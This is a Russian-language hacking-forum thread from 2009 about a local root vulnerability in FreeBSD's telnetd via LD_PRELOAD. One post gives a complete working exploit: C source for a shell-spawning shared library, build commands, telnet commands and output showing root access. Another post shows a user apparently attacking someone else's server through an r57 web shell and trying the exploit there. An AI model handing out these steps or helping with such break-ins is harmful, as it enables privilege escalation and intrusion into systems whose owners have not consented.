ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > *nix
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Получение root привилегий через telnetd демон во FreeBSD
  #1  
Старый 16.02.2009, 13:02
Аватар для betakley
betakley
Новичок
Регистрация: 29.12.2008
Сообщений: 24
Провел на форуме:
228928

Репутация: 20
Exclamation Получение root привилегий через telnetd демон во FreeBSD

Инфомация взята с opennet.ru
Первоисточник: http://lists.grok.org.uk/pipermail/full-disclosure/2009-February/067954.html

Цитата:
В telnetd демоне, входящем в состав FreeBSD 7.x, обнаружена критическая уязвимость, позволяющая локальному злоумышленнику получить привилегии суперпользователя в системе. Предположительно проблеме подвержены OpenBSD, NetBSD и другие системы. Эксплоит настолько прост, что вначале даже не верится, что он может работать. Уязвимость связана ненадлежащей чисткой переменных окружения перед вызовом /bin/login из telnetd (отсутствует чистка переменной окружения LD_PRELOAD, которую можно передать со стороны клиента, так как telnet протокол поддерживает передачу переменных окружения). Суть метода в подключении, через LD_PRELOAD простейшей библиотеки, запускающей /bin/sh в процедуре инициализации. Библиотека должна находиться на атакуемом хосте. При этом в момент подключения к локальному telnetd серверу, злоумышленник без аутентификации получает root shell. Теоретически на основе данной проблемы можно реализовать и сценарий удаленной атаки (например, библиотека может быть загружена через анонимный FTP). Исправления уязвимости в настоящий момент не доступны, рекомендуется отключить telnet сервис, если он используется.
сейчас под рукой нет bsd-системы, как с работы вернусь обязательно проверю. пробуем, отписываем, на каких ОС и версиях прокатило
 
Ответить с цитированием

  #2  
Старый 16.02.2009, 14:39
Аватар для BuG_4F
BuG_4F
Участник форума
Регистрация: 20.05.2008
Сообщений: 144
Провел на форуме:
1436858

Репутация: 171
Отправить сообщение для BuG_4F с помощью ICQ
По умолчанию

Забавно
Опишешь, через что использовать эксполит ?
 
Ответить с цитированием

  #3  
Старый 17.02.2009, 00:54
Аватар для Aag
Aag
Познающий
Регистрация: 26.07.2005
Сообщений: 54
Провел на форуме:
47901

Репутация: 46
По умолчанию

Уязвимость чисто теоретическая, с тех пор как изобрели ssh, только самоубийцы будут держать на своих серверах демон telnetd. Уже лет 10 как telnetd никто не использует.
 
Ответить с цитированием

  #4  
Старый 17.02.2009, 03:03
Аватар для betakley
betakley
Новичок
Регистрация: 29.12.2008
Сообщений: 24
Провел на форуме:
228928

Репутация: 20
Smile

Цитата:
Сообщение от BuG_4F  
Забавно
Опишешь, через что использовать эксполит ?
Во FreeBSD 6.2 пробовал - не прокатило
зато в 7.0 на ура
делал все как написано в источнике:

1. создаем файл hack.c
Код:
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
        FILE *f;
        setenv("LD_PRELOAD", "", 1);
        system("echo HACKED!!!;/bin/sh");
}
2. компилим
Код:
gcc -o hack.o -c hack.c -fPIC
gcc -shared -Wl,-soname,lib.so.1 -o lib.so.1.0 hack.o -nostartfiles
3. перемещаем например сюда
Код:
mv lib.so.1.0 /tmp
4. проверяем текущего юзера
Код:
$id
uid=1001(betakley) gid=1001(betakley) groups=1001(betakley),0(wheel)
5. набираем команду telnet и вводим
Код:
auth disable SRA
environ define LD_PRELOAD /tmp/lib.so.1.0
open localhost
6. получаем
Код:
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

FreeBSD/i386 (test) (ttyp1)

HACKED!!!
7. проверяем
Код:
# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
# uname -a
FreeBSD test 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008     root@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
#
 
Ответить с цитированием

  #5  
Старый 17.02.2009, 08:37
Аватар для .acme
.acme
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
Провел на форуме:
1266776

Репутация: 93
По умолчанию

http://lists.grok.org.uk/pipermail/full-disclosure/2009-February/067960.html
 
Ответить с цитированием

  #6  
Старый 18.02.2009, 01:22
Аватар для tmp
tmp
Участник форума
Регистрация: 10.03.2005
Сообщений: 234
Провел на форуме:
936234

Репутация: 56
По умолчанию

блин, на
FreeBSD 4.7-RELEASE-p28 не катит
-------------------------
nc big***.***.net 11***
Password:***
welcome to r57 shell
Warning: no access to tty (Bad file descriptor).
Thus no job control in this shell.
big**** /usr/local/phpMyAdmin-2.10.0.2-all-languages> telnet
auth disable SRA
environ define LD_PRELOAD /tmp/libGLo.so.1.0
open localhost
telnet> telnet> telnet> Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

FreeBSD/i386 (big***.r***.net) (ttyp1)

login:
--------------------------------------------------
Уже почти неделю с этим сервером мучаюсь
 
Ответить с цитированием

  #7  
Старый 27.02.2009, 01:52
Аватар для Hirurgi
Hirurgi
Новичок
Регистрация: 12.01.2009
Сообщений: 13
Провел на форуме:
18096

Репутация: 0
По умолчанию

В 7.0 переписали код так что теперь 4.7 в отношении телнета более безопасно. клево блин.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
про socks5 banall *nix 9 11.10.2006 10:17
Помогите откомпилить!! LoFFi Уязвимости 19 19.03.2006 22:56
Получение шела через Cgi приложения k00p3r Чужие Статьи 0 08.06.2005 15:04



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ